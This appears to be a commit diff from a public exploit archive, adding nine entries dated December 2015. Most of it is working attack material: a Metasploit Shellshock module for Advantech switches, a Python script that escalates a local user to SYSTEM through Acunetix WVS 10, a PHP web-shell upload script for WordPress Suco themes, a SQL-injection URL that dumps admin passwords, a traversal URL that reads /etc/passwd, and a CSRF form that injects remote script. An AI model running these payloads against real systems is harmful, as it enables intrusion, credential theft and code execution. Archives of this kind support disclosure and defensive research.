DB: 2015-12-03

9 new exploits

files.csv

@@ -35103,5 +35103,14 @@ id,file,description,date,author,platform,type,port
 38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Aaccess (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0
 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80
 38841,platforms/php/webapps/38841.txt,"Zenphoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80
+38842,platforms/php/webapps/38842.txt,"Testa OTMS Multiple SQL Injection Vulnerabilities",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0
+38843,platforms/php/webapps/38843.txt,"TomatoCart 'install/rpc.php' Local File Include Vulnerability",2013-11-18,Esac,php,webapps,0
 38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Local Root",2015-12-01,rebel,multiple,local,0
 38836,platforms/multiple/webapps/38836.txt,"ntop-ng <= 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0
+38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross Site Request Forgery Vulnerability",2013-11-23,"Haider Mahmood",php,webapps,0
+38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0
+38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0
+38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
+38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0
+38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
+38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0

platforms/cgi/remote/38849.rb

@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
+      'Description' => %q{
+        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
+        handles external environment variables. This module targets the 'ping.sh' CGI
+        script, acessible through the Boa web server on Advantech switches. This module
+        was tested against firmware version 1322_D1.98.
+      },
+      'Author' => 'hdm',
+      'References' => [
+        ['CVE', '2014-6271'],
+        ['CWE', '94'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
+        ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
+        ['URL', 'https://access.redhat.com/articles/1200223'],
+        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
+      ],
+      'Privileged' => false,
+      'Arch' => ARCH_CMD,
+      'Platform' => 'unix',
+      'Payload' =>
+        {
+          'Space' => 1024,
+          'BadChars' => "\x00\x0A\x0D",
+          'DisableNops' => true,
+          'Compat' =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'openssl generic'
+            }
+        },
+      'Targets' =>  [[ 'Automatic Targeting', { 'auto' => true } ]],
+      'DefaultTarget' => 0,
+      'License' => MSF_LICENSE,
+      'DisclosureDate' => 'Dec 01 2015'
+    ))
+    register_options([
+      Opt::RPORT(80)
+    ], self.class)
+  end
+
+  #
+  # CVE-2014-6271
+  #
+  def cve_2014_6271(cmd)
+    %{() { :;}; $(#{cmd}) & }
+  end
+
+  #
+  # Check credentials
+  #
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/cgi-bin/ping.sh'
+    )
+    if !res
+      vprint_error("#{peer} - No response from host")
+      return Exploit::CheckCode::Unknown
+    elsif res.headers['Server'] =~ /Boa\/(.*)/
+      vprint_status("#{peer} - Found Boa version #{$1}")
+    else
+      print_status("#{peer} - Target is not a Boa web server")
+      return Exploit::CheckCode::Safe
+    end
+
+    if res.body.to_s.index('127.0.0.1 ping statistics')
+      return  Exploit::CheckCode::Detected
+    else
+      vprint_error("#{peer} - Target does not appear to be an Advantech switch")
+      return Expoit::CheckCode::Safe
+    end
+  end
+
+  #
+  # Exploit
+  #
+  def exploit
+    cmd = cve_2014_6271(payload.encoded)
+    vprint_status("#{peer} - Trying to run command '#{cmd}'")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/cgi-bin/ping.sh',
+      'agent'  => cmd
+    )
+  end
+
+end

platforms/hardware/remote/38850.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63880/info
+
+Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code.
+
+Successfully exploiting this issue may allow an attacker to upload and execute arbitrary code with SYSTEM privileges.
+
+Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR} 

platforms/multiple/remote/38845.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63805/info
+
+SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities.
+
+Attackers can exploit these issues to execute arbitrary commands in the context of the affected system.
+
+SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected. 
+
+curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1 

platforms/multiple/remote/38846.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/63814/info
+
+nginx is prone to a remote security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
+
+nginx 0.8.41 through 1.5.6 are vulnerable. 
+
+The following example data is available:
+
+/file \0.php 

platforms/php/webapps/38842.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/63773/info
+
+Testa OTMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable. 
+
+http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
+http://www.example.com/test/admin/index.php 

platforms/php/webapps/38843.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63795/info
+
+TomatoCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+TomatoCart 1.1.8.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg 

platforms/php/webapps/38844.html

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/63800/info
+
+The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected. 
+
+<form id=.upload-form. 
+action=.http://www.example1.com/wordpress/wp-admin/admin.php?page=bw-videos. 
+method=.post.>
+<table class=.form-table.>
+<tbody>
+<tr valign=.top.>
+<th scope=.row.>Title</th>
+<td><input id=.bw_title. type=.text. maxlength=.75. name=.bw_title. 
+size=.70. value=.http://www.example2.com/code/evil.js. />
+</tr>
+<tr valign=.top .>
+<th scope=.row.>URL</th>
+<td><input id=.bw_url. type=.text. maxlength=.75. name=.bw_url. 
+size=.70. value=.http://www.example2.com/code/evil.js. />
+</td>
+</tr>
+</tbody>
+</table>
+</form>

platforms/php/webapps/38848.php

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/63836/info
+
+The Suco themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+<?php
+$uploadfile="devilscream.php";
+$ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");
+curl_setopt($ch, CURLOPT_POST, true);  
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+        array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>

platforms/windows/local/38847.py

@@ -0,0 +1,162 @@
+'''
+========================================================================
+Acunetix WVS 10 - from guest to Sytem (Local privilege escalation)
+
+CVE: CVE-2015-4027
+Author: (me) Daniele Linguaglossa
+Affected Product: Acunetix WVS 10
+Exploit: Local privilege escalation
+Vendor: Acunetix ltd
+Remote: No
+Version: 10
+=========================================================================
+A local privilege escalation exists in Acunetix  WVS 10, it allow
+a local user (even guest) to gain same privilege as System user.
+
+With default Acunetix installation, a service called "AcuWVSSchedulerv10"
+will be installed, this service run as local system user.
+
+AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction
+it expose some API to interact via a web server usually localhost:8183.
+
+API:
+
+/listScan
+/addScan <== vulnerable one
+/deleteScan
+etc...
+
+When a user schedule a scan API "addScan" will be called as following
+
+-------------------------------------------------------------------------------
+POST /api/addScan HTTP/1.1
+Host: localhost:8183
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/json; charset=UTF-8
+RequestValidated: true
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost:8183/
+Content-Length: 452
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+{
+    "scanType": "scan",
+    "targetList": "",
+    "target": ["http://.target.it"],
+    "recurse": "-1",
+    "date": "12/2/2015",
+    "dayOfWeek": "1",
+    "dayOfMonth": "1",
+    "time": "12:21",
+    "deleteAfterCompletion": "False",
+    "params": {
+        "profile": "Default",
+        "loginSeq": "<none>",
+        "settings": "Default",
+        "scanningmode": "heuristic",
+        "excludedhours": "<none>",
+        "savetodatabase": "True",
+        "savelogs": "False",
+        "generatereport": "False",
+        "reportformat": "PDF",
+        "reporttemplate": "WVSAffectedItemsReport.rep",
+        "emailaddress": ""
+    }
+}
+------------------------------------------------------------------------------
+
+The first thing i noticed was the reporttemplate, this was used to create report
+when scanning ends, so it means an external file wich we can control will be then 
+used by System! this would be interesting enough but i never look deep into.
+Instead i noticed something even worst, filename was used as argument to wvs.exe
+called with system privilege!
+
+By looking at how Acunetix handled reporttemplate argument i figured out that was 
+possibile to inject custom arguments within reporttemplate, now this is where 
+Acunetix help us :D in fact wvs was provided with an interesting argument it was 
+/Run as reference says:
+
+https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
+
+Run a command line command during the crawl.
+Syntax: /Run [command]
+
+Example: /Run curl http://example.com/dir1/
+
+Wow that's really nice, so in order to execute a command we must insert a fake 
+Crawl followed by a Run command so reporttemplate become:
+
+"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"
+
+it worked cmd runned as System!
+==================================================================================
+
+Now let's pwn this!
+
+escalation.py
+'''
+
+import httplib
+import json
+from datetime import datetime
+import sys
+from time import gmtime, strftime
+
+
+COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
+ACUHOST = '127.0.0.1'
+ACUPORT = 8183
+ACUHEADERS = {
+    "Content-Type": "application/json; charset=UTF-8",
+    "X-Requested-With": "XMLHttpRequest",
+    "Accept": "application/json, text/javascript, */*; q=0.01",
+    "RequestValidated": "true"
+    }
+ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\"" 
+ACUDATA = {"scanType":"scan",
+           "targetList":"",
+           "target":["http://"+"A"*2048],
+           "recurse":"-1",
+           "date":strftime("%m/%d/%Y", gmtime()),
+           "dayOfWeek":"1",
+           "dayOfMonth":"1",
+           "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
+           "deleteAfterCompletion":"False",
+           "params":{"profile":"Default",
+                     "loginSeq":"<none>",
+                     "settings":"Default",
+                     "scanningmode":"heuristic",
+                     "excludedhours":"<none>",
+                     "savetodatabase":"True",
+                     "savelogs":"False",
+                     "generatereport":"False",
+                     "reportformat":"PDF",
+                     "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
+                     "emailaddress":""}
+           }
+
+def sendExploit():
+    conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
+    conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
+    resp = conn.getresponse()
+    return "%s %s" % (resp.status, resp.reason)
+
+print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
+print "[+] Command : %s will be executed as SYSTEM" % COMMAND
+print "[+] Sending exploit..."
+print "[+] Result: "+sendExploit()
+print "[+] Done!"
+
+'''
+============================================================================
+
+I hope this write-up was funny enough anyway i really would like to thank
+Acunetix product manager N.S. for the really fast answer and bug mitigation, 
+right now a patch exists so hurry up download it now.
+============================================================================
+'''